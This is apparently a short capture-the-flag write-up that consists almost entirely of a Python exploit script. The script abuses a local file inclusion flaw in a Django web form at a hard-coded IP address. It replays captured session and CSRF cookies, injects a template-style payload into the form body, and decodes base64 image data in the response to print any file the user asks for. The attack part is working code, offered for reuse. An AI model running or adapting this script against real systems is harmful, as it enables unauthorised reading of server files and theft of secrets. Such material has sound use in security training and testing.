Tags: lfi
Rating: 1.0
Exploit LFI to achieve arbitrary file read. The session cookie, CSRF token and target host/port in the script are instance-specific and must be refreshed before use.
```python
import requests
from bs4 import BeautifulSoup
from base64 import b64decode
import random
import string
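# Base URL of the vulnerable instance. Referer/Origin are derived from it so they
# agree with the host the form is actually POSTed to (send_request posts to
# port 45262); the original captured headers still pointed at port 26683, and a
# Django backend with Origin checking (4.0+) can reject a POST whose Origin does
# not match the request host with a CSRF 403.
TARGET = 'http://193.57.159.27:45262'

# Browser-like request headers replayed with every POST.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-GB,en;q=0.5',
    'Referer': TARGET + '/new/',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': TARGET,
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
}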
# Cookies captured from an authenticated browser session on the target.
# Both values are bound to that instance and expire with it.
# NOTE(review): the form's csrfmiddlewaretoken in send_request is presumably
# validated against this csrftoken cookie (Django pairs them), so rotate the
# two together when refreshing the session.
cookie = dict(
    csrftoken="WpkSPU3EitDvJgR6O8SOeaNACQLMLmNPDecOYKdrpUnG5yQFa45lHEDpqFFoEvHN",
    sessionid=".eJxNjEsKwjAURQVxKIKr0EnoS9qXZCbOXUN5aRLbKg30MxRcQIZxIe5QRYXe4TmHe189novvbmkX1yVNY11Og-vLxqa4BMAUtzNqqLq47q32tqXuHFgVurFvDPsk7GcHdgrWXY__djM7qGmoUzwgFCAxz4i85iI3ymSCo3fca22l8KC1stIgeo-ggVdYAHGnpORCgcnTxF4l3D6b:1mFhwu:mlibTmM3JvM87A1WTadKyJVBiuYRJJUgj6h-HKyYfRM",
)
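def send_request(payload, url="http://193.57.159.27:45262/new/", timeout=30):
    """POST the file-read payload to the vulnerable form and print the file it returns.

    The response page carries a ``<p class="card-text">`` whose ``<img>`` has an
    inline ``data:image/png;base64,`` source; the base64 body is the raw content
    of the requested file, so it is decoded and printed.

    Args:
        payload: path (or traversal string) of the file to read. It is spliced
            into the ``body`` form field as ``({}}{<payload>}..})``.
        url: form endpoint to POST to; defaults to the hard-coded target.
        timeout: seconds to wait for the server before giving up, so a dead
            instance does not hang the script forever.

    Returns:
        The decoded file content as ``bytes`` (also printed to stdout).

    Raises:
        RuntimeError: the response does not contain the expected card image.
            Typically this means the hard-coded session/CSRF tokens have
            expired or the payload was rejected.
    """
    data = {
        "csrfmiddlewaretoken": "J0krStVNFuVQo6cpg2JpH5RFWeD69XBwqPcn1j5AMVF1KobYCYWWazHuK3xI26vu",
        "name": "test15",
        "body": "({}}{%s}..})" % payload,
    }
    response = requests.post(url, headers=headers, data=data, cookies=cookie, timeout=timeout)

    soup = BeautifulSoup(response.text, "html.parser")
    paragraph = soup.find("p", class_="card-text")
    img = paragraph.img if paragraph is not None else None
    prefix = "data:image/png;base64,"
    src = img.get("src", "") if img is not None else ""
    # Fail with a readable message instead of an AttributeError on a login
    # redirect / CSRF 403 page that lacks the card image.
    if not src.startswith(prefix):
        raise RuntimeError(
            "unexpected response (HTTP %d): card image not found - the session "
            "or CSRF token may have expired" % response.status_code
        )

    contents = b64decode(src[len(prefix):])
    # Arbitrary files are not necessarily UTF-8; substitute undecodable bytes
    # rather than crash on a binary file.
    print(contents.decode("utf-8", errors="replace"))
    return contents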
if __name__ == "__main__":
    # One-shot interactive use: prompt for a path and dump that file.
    send_request(input("File to read: ").strip())
```